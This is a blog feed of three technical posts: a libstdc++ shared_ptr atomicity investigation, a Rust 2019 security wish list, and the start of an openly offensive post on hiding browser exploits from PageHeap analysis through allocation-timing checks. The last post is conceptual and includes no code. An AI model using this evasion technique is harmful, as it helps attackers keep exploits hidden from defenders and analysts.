Snf's blog2019-11-17T05:09:48+00:00http://snf.github.ioS.N. Fernandezshared_ptr: the (not always) atomic reference counted smart pointer2019-02-13T00:00:00+00:00http://snf.github.io/2019/02/13/shared-ptr-optimization<!--
```
rustc -O -L. main.rs
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:`pwd` ./main
objdump -d a.createthread.shared -M intel |c++filt|less
g++ -shared -pthread -fPIC main.cpp -o libcreatethread.so
```
-->
<h3 id="introduction">Introduction</h3>
<p>This is a write-up of the <em>“behavioral analysis”</em> of <code class="language-plaintext highlighter-rouge">shared_ptr<T></code> reference count in GNU’s libstdc++. This smart pointer is used to share references to the same underlaying pointer.</p>
<p>The mechanism beneath works by tracking the amount of references through a reference count so the pointer gets freed only after the last reference is destructed. It is usually used in multi-threaded programs (in conjunction with other types) because of the guarantees of having its reference count tracked atomically.</p>
<!-- It turns out that when `pthread_create` is not imported, the reference count operations are not atomic. -->
<h3 id="story-time">Story time</h3>
<p>A few months ago, I was running a micro-benchmark on data structures in <a href="https://rust-lang.com">Rust</a> vs C++ ones.</p>
<p>At one point, I found that my Rust port of an immutable RB tree insertion was significantly slower than the C++ one. It was unexpected to me as both codebases were idiomatic and Rustc optimizes very well usually matching C++ speed.</p>
<p>I proceeded to re-check that my code was correct. At first I thought that my re-balancing code could be wrong so I put it side by side with the C++ one but couldn’t find any defect.</p>
<h3 id="profiling">Profiling</h3>
<p>The second day, I started profiling with <a href="http://valgrind.org/docs/manual/cl-manual.html">callgrind</a> and <a href="http://valgrind.org/docs/manual/cg-manual.html">cachegrind</a>. Here is where I got the <em>aha</em> moment. Every part of the code that was <em>copying</em> <code class="language-plaintext highlighter-rouge">shared_ptr<T></code> was being much faster than my equivalent <a href="https://doc.rust-lang.org/std/sync/struct.Arc.html#method.clone"><code class="language-plaintext highlighter-rouge">Arc::clone</code></a> calls in Rust.</p>
<p>Inside KCachegrind, I saw something unexpected, the code was straightforward but before increasing <code class="language-plaintext highlighter-rouge">shared_ptr</code>’s reference count during a pointer copy, there was a branch to decide if it should do an atomic addition or a non-atomic one. The code-path being taken was the non atomic one!</p>
<p><img src="/public/data/sharedptr/kcachegrind.png" alt="KCachegrind showing that no atomic operation was being executed" /></p>
<p>Certainly, my knowledge about <code class="language-plaintext highlighter-rouge">shared_ptr</code> was being challenged. As far as I knew, the reference count should be atomic so it could be used in parallel programs sharing the value without the risk of racing the count and ending up with dangling pointers or memory leaks.</p>
<h3 id="tracking-the-code">Tracking the code</h3>
<p>Simplified C++ poc:</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">const</span> <span class="k">auto</span> <span class="n">tree</span> <span class="o">=</span> <span class="n">make_shared</span><span class="o"><</span><span class="n">Tree</span><span class="o"><</span><span class="kt">int</span><span class="o">>></span><span class="p">(</span><span class="mi">10</span><span class="p">);</span>
<span class="k">for</span><span class="p">(</span><span class="k">auto</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">100</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">const</span> <span class="n">shared_ptr</span><span class="o"><</span><span class="n">Tree</span><span class="o"><</span><span class="kt">int</span><span class="o">>></span> <span class="n">tree_copy</span> <span class="o">=</span> <span class="n">tree</span><span class="p">;</span>
<span class="c1">// black_box(tree_copy);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>In Rust it is almost the same line by line:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">let</span> <span class="n">tree</span> <span class="o">=</span> <span class="nn">Arc</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nn">Tree</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="mi">10</span><span class="p">));</span>
<span class="k">for</span> <span class="mi">_</span><span class="n">i</span> <span class="n">in</span> <span class="mi">0</span><span class="o">..</span><span class="mi">100</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">tree_copy</span> <span class="o">=</span> <span class="n">tree</span><span class="nf">.clone</span><span class="p">();</span>
<span class="c">// test::black_box(tree_copy);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>To understand what was happening better, I compiled the C++ without optimizations which gave me some disassembly to follow:</p>
<p>loop code:</p>
<pre><code class="language-asm"> d7b: cmp DWORD PTR [rbp-0x14],0x63
d7f: jg d9a <main+0x59>
d81: lea rdx,[rbp-0x30]
d85: lea rax,[rbp-0x40]
d89: mov rsi,rdx
d8c: mov rdi,rax
d8f: call f1c <std::shared_ptr<Tree<int> >::operator=(std::shared_ptr<Tree<int> > const&)> #### (*)
d94: add DWORD PTR [rbp-0x14],0x1
d98: jmp d7b <main+0x3a>
</code></pre>
<p><code class="language-plaintext highlighter-rouge">operator=</code>:</p>
<pre><code class="language-asm"> 1021: mov rax,QWORD PTR [rbp-0x8]
1025: mov rdi,rax
1028: call 1158 <std::_Sp_counted_base<(__gnu_cxx::_Lock_policy)2>::_M_add_ref_copy()> #### (*)
102d: mov rax,QWORD PTR [rbp-0x18]
1031: mov rax,QWORD PTR [rax]
</code></pre>
<p>And following <code class="language-plaintext highlighter-rouge">_M_add_ref_copy()</code>:</p>
<pre><code class="language-asm"> 116c: mov esi,0x1
1171: mov rdi,rax
1174: call cfd <__gnu_cxx::__atomic_add_dispatch(int*, int)>
</code></pre>
<p><code class="language-plaintext highlighter-rouge">__atomic_add_dispatch</code>:</p>
<pre><code class="language-asm">0000000000000cfd <__gnu_cxx::__atomic_add_dispatch(int*, int)>:
cfd: push rbp
cfe: mov rbp,rsp
d01: sub rsp,0x10
d05: mov QWORD PTR [rbp-0x8],rdi
d09: mov DWORD PTR [rbp-0xc],esi
d0c: call c20 <__gthread_active_p()> #### (1)
d11: test eax,eax
d13: setne al
d16: test al,al
d18: je d2d
d1a: mov edx,DWORD PTR [rbp-0xc]
d1d: mov rax,QWORD PTR [rbp-0x8]
d21: mov esi,edx
d23: mov rdi,rax
d26: call c59 <__gnu_cxx::__atomic_add(int volatile*, int)> #### (2)
d2b: jmp d3e
d2d: mov edx,DWORD PTR [rbp-0xc]
d30: mov rax,QWORD PTR [rbp-0x8]
d34: mov esi,edx
d36: mov rdi,rax
d39: call c9b <__gnu_cxx::__atomic_add_single(int*, int)> #### (3)
d3e: nop
d3f: leave
d40: ret
</code></pre>
<p>Once here, I found a very interesting pattern. Depending on the return of <code class="language-plaintext highlighter-rouge">__gthread_active_p()</code> (1), it could either call <code class="language-plaintext highlighter-rouge">atomic_add</code> (2) or <code class="language-plaintext highlighter-rouge">atomic_add_single</code> (3).</p>
<p><code class="language-plaintext highlighter-rouge">atomic_add</code> does what I expect:</p>
<pre><code class="language-asm"> c6b: lock add DWORD PTR [rax],edx
</code></pre>
<p>but <code class="language-plaintext highlighter-rouge">atomic_add_single</code> does not:</p>
<pre><code class="language-asm"> caa: mov edx,DWORD PTR [rax]
cac: mov eax,DWORD PTR [rbp-0xc]
caf: add edx,eax
cb1: mov rax,QWORD PTR [rbp-0x8]
cb5: mov DWORD PTR [rax],edx
</code></pre>
<p>There are no <em>atomic</em> operations inside that function which opened these new question:</p>
<ol>
<li>Why is the C++ standard library optimizing the atomic addition?</li>
<li>Is this even safe?</li>
</ol>
<h3 id="to-atomic-or-not-to">To atomic or not to</h3>
<p>As expected, <code class="language-plaintext highlighter-rouge">atomic_add</code> and <code class="language-plaintext highlighter-rouge">atomic_add_single</code> were both straightforward:</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span>
<span class="nf">__atomic_add_single</span><span class="p">(</span><span class="n">_Atomic_word</span><span class="o">*</span> <span class="n">__mem</span><span class="p">,</span> <span class="kt">int</span> <span class="n">__val</span><span class="p">)</span>
<span class="p">{</span> <span class="o">*</span><span class="n">__mem</span> <span class="o">+=</span> <span class="n">__val</span><span class="p">;</span> <span class="p">}</span>
</code></pre></div></div>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span>
<span class="nf">__atomic_add</span><span class="p">(</span><span class="k">volatile</span> <span class="n">_Atomic_word</span><span class="o">*</span> <span class="n">__mem</span><span class="p">,</span> <span class="kt">int</span> <span class="n">__val</span><span class="p">)</span>
<span class="p">{</span> <span class="n">__atomic_fetch_add</span><span class="p">(</span><span class="n">__mem</span><span class="p">,</span> <span class="n">__val</span><span class="p">,</span> <span class="n">__ATOMIC_ACQ_REL</span><span class="p">);</span> <span class="p">}</span>
</code></pre></div></div>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span>
<span class="nf">__attribute__</span> <span class="p">((</span><span class="n">__unused__</span><span class="p">))</span>
<span class="n">__atomic_add_dispatch</span><span class="p">(</span><span class="n">_Atomic_word</span><span class="o">*</span> <span class="n">__mem</span><span class="p">,</span> <span class="kt">int</span> <span class="n">__val</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">__gthread_active_p</span><span class="p">())</span>
<span class="n">__atomic_add</span><span class="p">(</span><span class="n">__mem</span><span class="p">,</span> <span class="n">__val</span><span class="p">);</span>
<span class="k">else</span>
<span class="n">__atomic_add_single</span><span class="p">(</span><span class="n">__mem</span><span class="p">,</span> <span class="n">__val</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Now the new set of questions were about <code class="language-plaintext highlighter-rouge">__gthread_active_p()</code>. After a quick <code class="language-plaintext highlighter-rouge">grep</code>, I found that many functions were depending on its return value to go with a thread-safe operation or not. Finding all of them is an exercise for the reader.</p>
<p>To find the right implementation of <code class="language-plaintext highlighter-rouge">__gthread_active_p</code>, I preprocessed the file with <code class="language-plaintext highlighter-rouge">g++ -E main.cpp</code> and landed on <code class="language-plaintext highlighter-rouge">/usr/include/x86_64-linux-gnu/c++/6/bits/gthr-default.h:246</code>:</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="nf">__typeof</span><span class="p">(</span><span class="n">pthread_key_create</span><span class="p">)</span> <span class="n">__gthrw___pthread_key_create</span> <span class="n">__attribute__</span> <span class="p">((</span><span class="n">__weakref__</span><span class="p">(</span><span class="s">"__pthread_key_create"</span><span class="p">)));</span>
</code></pre></div></div>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">int</span>
<span class="nf">__gthread_active_p</span> <span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">static</span> <span class="kt">void</span> <span class="o">*</span><span class="k">const</span> <span class="n">__gthread_active_ptr</span>
<span class="o">=</span> <span class="n">__extension__</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="o">&</span><span class="n">__gthrw___pthread_key_create</span><span class="p">;</span>
<span class="k">return</span> <span class="n">__gthread_active_ptr</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<h3 id="weakref-and-pthread_key_create"><code class="language-plaintext highlighter-rouge">weakref</code> and <code class="language-plaintext highlighter-rouge">pthread_key_create</code></h3>
<p><a href="https://gcc.gnu.org/onlinedocs/gcc-4.7.2/gcc/Function-Attributes.html"><code class="language-plaintext highlighter-rouge">__weakref__</code></a> is an attribute to declare a <strong>weak symbol</strong>. It means that if it is referenced in another place, it becomes available, but while it isn’t, it’s a NULL pointer.
It can be used for defining external symbols which may or may not be available. Can also be used for defining functions that could be intercepted by other more specialized ones. There is a blog post with more information about it <a href="https://leondong1993.github.io/2017/04/15/strong-weak-symbol/">here</a>.</p>
<p><a href="http://pubs.opengroup.org/onlinepubs/007904975/functions/pthread_key_create.html"><code class="language-plaintext highlighter-rouge">__pthread_key_create</code></a> is a function used to assign values into the local thread storage.</p>
<p>I’m sure you have discovered by now what’s happening, but just in case C++ developers left a comment:</p>
<!-- /* -->
<blockquote>
<p>For a program to be multi-threaded the only thing that it certainly must
be using is pthread_create. However, there may be other libraries that
intercept pthread_create with their own definitions to wrap pthreads
functionality for some purpose. In those cases, pthread_create being
defined might not necessarily mean that libpthread is actually linked
in.</p>
<p>For the GNU C library, we can use a known internal name. This is always
available in the ABI, but no other library would define it. That is
ideal, since any public pthread function might be intercepted just as
pthread_create might be. __pthread_key_create is an “internal”
implementation symbol, but it is part of the public exported ABI. Also,
it’s among the symbols that the static libpthread.a always links in
whenever pthread_create is used, so there is no danger of a false
negative result in any statically-linked, multi-threaded program.</p>
<p>For others, we choose pthread_cancel as a function that seems unlikely
to be redefined by an interceptor library. The bionic (Android) C
library does not provide pthread_cancel, so we do use pthread_create
there (and interceptor libraries lose).<br />
<!-- */ --></p>
</blockquote>
<p>So basically, what is happening here is checking if <code class="language-plaintext highlighter-rouge">pthread_create</code> is being imported into the program. If it is, the weak reference becomes available, otherwise it is NULL. Checking this variable, it is easy to see if the program is using threads or not.</p>
<h3 id="sound-or-not">Sound or not</h3>
<p>What if a program uses parallelism without bringing <code class="language-plaintext highlighter-rouge">pthread_key_create</code> symbol into context? Is it possible?</p>
<p>We can theorize…</p>
<h4 id="parallelism-without-pthread">Parallelism without pthread</h4>
<p>It is possible to create threads by using the OS syscalls bypassing completely the requirement of pthead. (Un)fortunately, I couldn’t find any popular libraries that implement the functionality by using the syscall interface instead of relying on pthread. OpenMP and a few other runtimes I checked all depend on it.</p>
<p>It might exist but doesn’t seem to be very common.</p>
<h4 id="shared-library">Shared library</h4>
<p>Code compiled into a dynamic library can be called from other programs that might introduce external parallelism and expecting the library to be thread-safe because it uses <code class="language-plaintext highlighter-rouge">shared_ptr</code>.</p>
<p>To get more into the question, I created an object that doesn’t use pthread_create because it expects all the parallelism to be external. After an objdump of the symbol table I can see that the symbol is still imported as weak (the w in the second column):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0000000000000000 w F *UND* 0000000000000000 __pthread_key_create@@GLIBC_2.2.5
</code></pre></div></div>
<h4 id="shared-library-loaded-by-static-binary">Shared library loaded by static binary</h4>
<p>The programs that would introduce the external parallelism would also load <code class="language-plaintext highlighter-rouge">pthread</code> and enable the weak symbol in the library too. However, if the loading program has compiled pthread statically, the dynamic loader has no way of knowing if <code class="language-plaintext highlighter-rouge">pthread_create</code> is used by the program and wouldn’t make the weak symbol in the loaded library available. If this happens, the assumption would be broken and shared_ptr would be behaving erronously.</p>
<p>I assume that this is also a very rare case and from a quick googling, I can see tons of problems caused by using <code class="language-plaintext highlighter-rouge">dlopen</code> in statically compiled binaries.</p>
<p>In conclusion, I’ll assume this is not a typical scenario and it is <strong>mostly</strong> safe.</p>
<h3 id="why-not-go-further-with-the-optimization-efforts">Why not go further with the optimization efforts?</h3>
<p>If a program can assume that all its threading is happening through pthread with runtime checks, its implementation can be adapted to also detect when more than a thread is running.</p>
<p>Speculating, pthread could be updating a global count with the amount of running threads whenever threads are created, (un)suspended, or canceled. As far as I can think about it, the <em>check</em> doesn’t have to be atomic because when there is only one thread creating another one, the count doesn’t have to be atomic (from 0 to 1). Then when it’s suspending other threads, it can suspend it and later decrement the count. By the time the count is synchronized with the other thread, there is only one active again.</p>
<p>Is this a missed optimization opportunity?, probably not… However, the C++ standard is quite clear about the atomic operations in the <a href="https://timsong-cpp.github.io/cppwp/requirements">libraries</a>:</p>
<blockquote>
<p>Library Wide Requirements - (2) Requirements specified in terms of interactions between threads do not apply to programs having only a single thread of execution.</p>
</blockquote>
<h3 id="other-c-implementations">Other C++ implementations</h3>
<p>After my adventure with <strong>libstdc++</strong>, I decided to check VisualC++ and libcxx ones.</p>
<p><a href="https://libcxx.llvm.org/">Libcxx</a> has a compilation check with a macro to disable threads completely by the flag <code class="language-plaintext highlighter-rouge">_LIBCPP_HAS_NO_THREADS</code>. If it is set, all atomic operations will fallback to non-atomic ones. There is more information in the <a href="https://libcxx.llvm.org/docs/DesignDocs/ThreadingSupportAPI.html">documentation</a>.</p>
<p>VisualC++ doesn’t have its source code available, but from disassembling <code class="language-plaintext highlighter-rouge">shared_ptr::operator=</code>, I can see that the increment is only atomic and there is no runtime check to fall-back into a non-atomic one. It’s unclear to me if other versions provide them.</p>
<h3 id="de-optimizing-the-micro-benchmark">De-optimizing the micro-benchmark</h3>
<p>This was an easy step, I just referenced <code class="language-plaintext highlighter-rouge">pthread_create</code> in the program and the reference count became atomic again.</p>
<p>Although uninteresting to the topic of the blog post, after the modifications, both programs performed very similarly in the benchmarks.</p>
<h3 id="add-this-optimization-to-rust">Add this optimization to Rust!</h3>
<p>Not so fast! Arc actually means Atomic Reference Counted so it would be a plain lie if it hadn’t use atomic operations on the reference count.</p>
<p>Furthermore, Rust’s std offers both <a href="https://doc.rust-lang.org/std/rc/struct.Rc.html">Rc</a> and <a href="https://doc.rust-lang.org/std/sync/struct.Arc.html">Arc</a> which share similar APIs so they can be used interchangeably whenever necessary and the type system would get your back if you had sent Rc between tasks due to it being <code class="language-plaintext highlighter-rouge">!Send</code> (not send).</p>
<h3 id="conclusion">Conclusion</h3>
<p>This was another failed case of micro-benchmarking. Optimizations go beyond your simple <code class="language-plaintext highlighter-rouge">-O3</code>. In this case, I didn’t know that the libstdc++ was changing its behaviour depending on if <code class="language-plaintext highlighter-rouge">pthread_create</code> was imported by the program or not.</p>
<p>While I’m probably not going to spend any more time on this, I’ve found a personally unknown thing about C++ standard library (GNU) and wanted to document it because it was interesting to track down.</p>
<p>Unfortunately, I cannot conclude if <code class="language-plaintext highlighter-rouge">shared_ptr<T></code> behaviour is completely safe in uncommon environments.</p>
<p>Also, my teammates should be preparing themselves for all my new <code class="language-plaintext highlighter-rouge">weakref</code> optimizations that I’m introducing in my code…</p>
<p>Thanks for reading.</p>
<ul>
<li>Follow me on Twitter: <a href="https://twitter.com/snfernandez">@snfernandez</a></li>
<li>Contact me at Gmail: sebanfernandez</li>
<li>Secure is better: <a href="http://snf.github.io/public/data/sebanfernandez_0xEB1C845F_pub.asc">GPG Key</a></li>
</ul>
Rust 2019: security2019-01-10T00:00:00+00:00http://snf.github.io/2019/01/10/rust-2019-security<h3 id="introduction">Introduction</h3>
<p>I’ve decided to write this blog post because this is one of Rust’s main selling points and the most important to me: <strong>memory safety without garbage collection</strong>.</p>
<p>The truth of that statement relies on writing purely safe Rust. Unfortunately, that’s not a real world case scenario. Some crates will use unsafe but most of them will depend on at least one crate which uses unsafe.</p>
<p>While these unsafe cases could be completely safe, they cannot be validated by the compiler so they rely on the developer’s good judgment. Now, this brings us to the same problem of having a C codebase but with easier findable bugs (<code class="language-plaintext highlighter-rouge">grep unsafe</code>).</p>
<p>The problem is now that if we are measuring safety of Rust according to safe vs unsafe, the most obvious metric to optimize for is amount of unsafe lines in the code.</p>
<p>And this is why I think that security should be part of Rust’s stable ecosystem development. And 2019 should be the year for improving the processes around it.</p>
<p>This is not something new and working groups are tackling this problem from different angles and you should join them if you are interested:</p>
<ul>
<li><a href="https://rust-lang.zulipchat.com/#narrow/stream/146229-wg-secure-code">Secure Code WG</a></li>
<li><a href="http://plv.mpi-sws.org/rustbelt/#publications">RustBelt</a> and <a href="https://internals.rust-lang.org/t/announcing-the-formal-verification-working-group/7240">Formal Verification WG</a></li>
<li><a href="https://github.com/rust-rfcs/unsafe-code-guidelines">Unsafe Code Guidelines WG</a></li>
</ul>
<h3 id="unsafe-rust">Unsafe Rust</h3>
<p>A big part of the unsafe code I usually see can fit into these categories:</p>
<ul>
<li>Integrating Rust with other components through FFI</li>
<li>Functionality not available in <code class="language-plaintext highlighter-rouge">core</code> or <code class="language-plaintext highlighter-rouge">std</code> (standard library)</li>
<li>Optimizations that cannot be expressed through the type system</li>
<li>Implement <a href="https://doc.rust-lang.org/nightly/nomicon/send-and-sync.html">send and sync</a> (I’m not discussing it here)</li>
</ul>
<!-- Detecting `unsafe` in dependencies used to be a hard task but projects like [cargo-geiger] make this process smoother. -->
<h4 id="rustffi">Rust+FFI</h4>
<p>The community has already learned that <strong><em>Rewrite it in Rust</em></strong> doesn’t scale well for big or fast-moving projects.</p>
<p>On the other hand, one of the things that I learned is that gradually replacing C/C++ with Rust code works quite well. The same happens with encapsulating C code with safe Rust abstractions.</p>
<p>For mixing code, we use <a href="https://doc.rust-lang.org/nightly/nomicon/ffi.html">ffi</a> bindings usually generated by <a href="https://github.com/rust-lang/rust-bindgen">bindgen</a>.</p>
<h5 id="isolation">Isolation</h5>
<p>A problem that has no practical solution yet is how can we guarantee safety in these cases of mixed code. This happens in almost every programming language that supports FFI so a possible implementation here might be able to be used in others.</p>
<p>The way I see it being tackled is having isolation at the FFI level. Where, either, we impose a serialization barrier to a process inside a sandbox, or use more modern compartmentalization technologies (such as <a href="https://www.cl.cam.ac.uk/~kg365/pubs/201505-oakland2015-cheri-compartmentalization.pdf">CHERI</a>).</p>
<p>While isolating unsafe code (C/C++) into a sandbox might solve the problem and can probably be implemented <em>“easily”</em> through bindgen and other existing libraries, it will incur into performance penalty very quickly and could also open a Pandora box of issues.</p>
<h5 id="memory-corruption-mitigations">Memory Corruption Mitigations</h5>
<p>Furthermore, to not degrade the security of the existing components when mixing other (unsafe) code with Rust, we must support all the memory corruption mitigations supported by the C and C++ compilers like <a href="https://en.wikipedia.org/wiki/Control-flow_integrity">control flow integrity</a>. In Microsoft security is a priority when components are shipped and not being able to impose the full security mitigations spectrum on a component which uses unsafe or mixed code might be a blocker.</p>
<p>Control flow guard, for example, requires not only support from the linker to generate the tables and inject the right code (which both LLVM and MSVC Linker already do), but also metadata emitted by Rust’s frontend.</p>
<h4 id="functionality-not-available-in-std">Functionality not available in <em>std</em></h4>
<p>It’s very hard to track which are these cases and even harder to decide which are worth adding to <code class="language-plaintext highlighter-rouge">core</code> or <code class="language-plaintext highlighter-rouge">std</code> so external libraries don’t have to implement it themselves. There is also the question of <em>is it really worth putting everything in the standard library?</em></p>
<p>An example I can think of now is casting between memory representations of the same size like <code class="language-plaintext highlighter-rouge">u64</code> to <code class="language-plaintext highlighter-rouge">[u8;8]</code>, or <code class="language-plaintext highlighter-rouge">[f32]</code> to <code class="language-plaintext highlighter-rouge">[u32]</code> as used in <a href="https://github.com/BurntSushi/byteorder">byteorder</a>.</p>
<p>The Secure Code WG is already looking for similar patterns so I’m very positive about seeing a lot of progress in this area in 2019.</p>
<p>A different approach to putting it all in the standard libraries is making a database of components audited by third parties which developers can trust. This is the approach being taken by <a href="https://github.com/dpc/crev/tree/master/cargo-crev">cargo-crev</a>. In my opinion, the only way that this is gonna work is if it is integrated with Cargo once the idea is validated.</p>
<h4 id="optimizations">Optimizations</h4>
<p>I often see, that in hot-paths, developers tend to do nasty things to avoid having performance impact there. More often than not, the code is “safe” but uses <code class="language-plaintext highlighter-rouge">unsafe</code>.</p>
<p>One of the examples was that back when I reviewed <a href="https://github.com/Azure/iotedge/tree/master/edgelet">edgelet</a>’s source code, I found that the only unsafe code outside of FFI was for copying data inside uninitialized buffers [[EDIT: This is imposed when implementing one of Tokio APIs and not a decision by IoTEdge team]]. While the operation of reading from these buffers is undefined, writing to them isn’t but it’s not possible to specify it with the current types.</p>
<p>This particular example might fall inside the previous point but I think it deserves a distinction between <em>“unsafe because faster”</em> and <em>“unsafe because I can’t safe”</em>. The solution, though, is very similar to what I proposed for the former.</p>
<h4 id="auditability">Auditability</h4>
<p>While optimizing for 0 unsafe is a great thing, there are will always be unsafe somewhere.</p>
<p>I like these tools and I think they will have greater impact when more companies start adopting Rust and have to fit it into the security development life-cycle (SDL):</p>
<ul>
<li><a href="https://github.com/RustSec/cargo-audit">cargo-audit</a> has a DB of crates with vulnerabilities and you can run it to check if your projects are using them</li>
<li><a href="https://github.com/rust-fuzz/cargo-fuzz">cargo-fuzz</a> makes fuzzing programs really easy through the help of LLVM’s libFuzzer</li>
<li><a href="https://github.com/anderejd/cargo-geiger">cargo-geiger</a> detects unsafe code usage from the dependencies</li>
<li><a href="https://github.com/dpc/crev/tree/master/cargo-crev">cargo-crev</a> is (an interface to) a database of audited components</li>
</ul>
<p>Leveraging all this tools in CI will surely help with SDL and I can see a 2019 where they become an integral part of the development process.</p>
<h3 id="others">Others</h3>
<h4 id="fallible-allocations">Fallible allocations</h4>
<p>While detecting memory allocation failure is a hard problem, the current situation of succeed or crash is an issue for places where you can predict that the allocation might fail. I worked on implementing the <code class="language-plaintext highlighter-rouge">try_alloc</code> <a href="https://github.com/rust-lang/rfcs/blob/master/text/2116-alloc-me-maybe.md">RFC</a> for the different collections but didn’t submit a stabilization PR yet because of concerns on <a href="https://github.com/rust-lang/rust/pull/52420">efforts</a> trying to improve the <code class="language-plaintext highlighter-rouge">Allocator API</code> (maybe) breaking backwards compatibility if it is stabilized.</p>
<h4 id="asyncawait">Async/await</h4>
<p>I’d like to see the whole async/await story improve with tokio adopting futures-0.3 and porting many of the derived crates to it as well. This year I tried using the new syntax with futures-0.3 but the ecosystem wasn’t there yet.</p>
<h4 id="a-better-ide-experience">A better IDE experience</h4>
<p>Others already mentioned it, but I think we need RLS to continue improving through the great work that has been getting during the past years. Not being able to use, in my case, VSCode in the same way as for C# or TypeScript is a little frustrating.</p>
<h3 id="conclusion">Conclusion</h3>
<p>While many interesting things happened during 2018. I see 2019 as a period for improving the ecosystem and tooling, and continue getting feedback on adoption blockers.</p>
<p>In my case, we are using it in Microsoft with a lot of very interesting Rustaceans and I think security should be a top priority if we want to go after <em>not quite memory safe</em> languages like C and C++.</p>
<p>Thanks for reading.</p>
<ul>
<li>Follow me on Twitter: <a href="https://twitter.com/snfernandez">@snfernandez</a></li>
<li>Contact me at Gmail: sebanfernandez</li>
<li>Secure is better: <a href="http://snf.github.io/public/data/sebanfernandez_0xEB1C845F_pub.asc">GPG Key</a></li>
</ul>
How to Protect an Exploit: Detecting PageHeap2017-05-04T00:00:00+00:00http://snf.github.io/2017/05/04/exploit-protection-i-page-heap<h3 id="introduction">Introduction</h3>
<p>Welcome back to this pretty much abandoned blog. If you don’t know me, I’ve been involved in exploit for some time before switching to a much less offensive job.</p>
<p>Yes, you read right, this is about protecting the exploit and <strong>not</strong> protecting from the exploit.</p>
<p>I always had these ideas on how to improve the exploits to the next level, not only during exploitation but also before and after executing it. I’ve written before (7 years already wow!) about <a href="/2010/11/15/process-continuation-after-exploit/">process continuation</a> and I’m pretty sure it is being widely used in exploits since ages, earlier than my post.
The problem is that many of this techniques remain in the shadows because they are not used in the exploit show offs.</p>
<p>This time, I’m writing a series of blogs on how to protect an exploit from executing in an environment where it might not succeed. The wild is a dangerous place and lot of hackers have lost exploits to it.</p>
<p>In this specific series of posts on how to protect an exploit, I’ll explore different methods to detect if the program we are attacking, in this case a browser, is being analyzed with some kind of tool so we can abort the exploitation instead of failing, crashing, and being detected.</p>
<h3 id="why">Why?</h3>
<p>Exploits are <a href="https://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/">valuable assets</a> so the most logical thing is that you want to keep them for as long as possible. In addition, most of the time you don’t want to be found using one. But for that to happen you need your exploit to go undetected.</p>
<p>The exploits found in the wild are first detected because of four main reasons:</p>
<ul>
<li>Re-used parts of other exploits so they triggered some signature in detection products</li>
<li>Crashed because it was unreliable and was analyzed later</li>
<li><strong>Crashed because the program is being monitored and was analyzed (honeypot?)</strong></li>
<li>You shared the exploit with a friend who tried to hack his/her ex</li>
</ul>
<p>Because we are focusing on the <strong>third one</strong>, our first guest will be <a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff549561(v=vs.85).aspx">PageHeap</a>.</p>
<h3 id="how-pageheap-works">How PageHeap works?</h3>
<p>PageHeap is a Windows tool included in the SDK/WDK which concept is to detect memory corruptions in the process heap as soon as possible.</p>
<p>To accomplish this, it replaces the heap allocator with another one. This allocator will make every allocation through VirtualAlloc making it return at least a page in size (4Kb in most systems).</p>
<p>But not only that, the returned address will point to the end of the page minus the requested size. Therefore, making any heap buffer overflow hit the end of the page.</p>
<p>This also prevents many widely used techniques that depend on an specific heap layout for arranging allocations in an specific way. Sometimes of the name of Heap Massaging, Heap Feng Shui or others (probably created for some BlackHat talk).</p>
<p>So, PageHeap breaks the preconcept of how the Heap works that, as described before, will make most of the exploits relying in any kind of heap layout crash.</p>
<p>If it’s the first time you read about PageHeap, you might want to google more about it as it’s a very handy tool for debugging.</p>
<h3 id="how-to-detect-pageheap">How to detect PageHeap?</h3>
<p>The main difference of a program behavior under PageHeap is that the heap allocations will be a lot slower no matter what the size is. Remember that heaps are optimized for allocating all kind of different object sizes as fast as possible.</p>
<p>Instead, with PageHeap, each allocation is requested to the kernel through VirtualAlloc which involves a context switch and processing it in the kernel. The time spent memsetting the memory before returning it is very short compared to the time it takes the rest of the allocation process.</p>
<p>As a consequence, a small allocation and a big one will be closer in time than with a normal heap if the big one always requires VirtualAlloc.</p>
<p>This time measurements can be detected thanks to the <code class="language-plaintext highlighter-rouge">window.performance.now()</code> counter available in most JavaScript engines and has a precision of micro-seconds (it’s reduced in some browsers because it can be abused for a big family of timing attacks, specially the ones involving TLB).</p>
<p>Because Chrome and Firefox have their own allocator, enabling PageHeap won’t change much (remember that it hijacks the original malloc/free functions). In this post we will target the two other browsers that use the default allocator in Windows: IE11 and Edge.</p>
<p>Looking for functions which allocate different amount of bytes, I came across the <code class="language-plaintext highlighter-rouge">Uint8Array</code> which is a <code class="language-plaintext highlighter-rouge">TypedArray</code> using an <code class="language-plaintext highlighter-rouge">ArrayBuffer</code> underneath.</p>
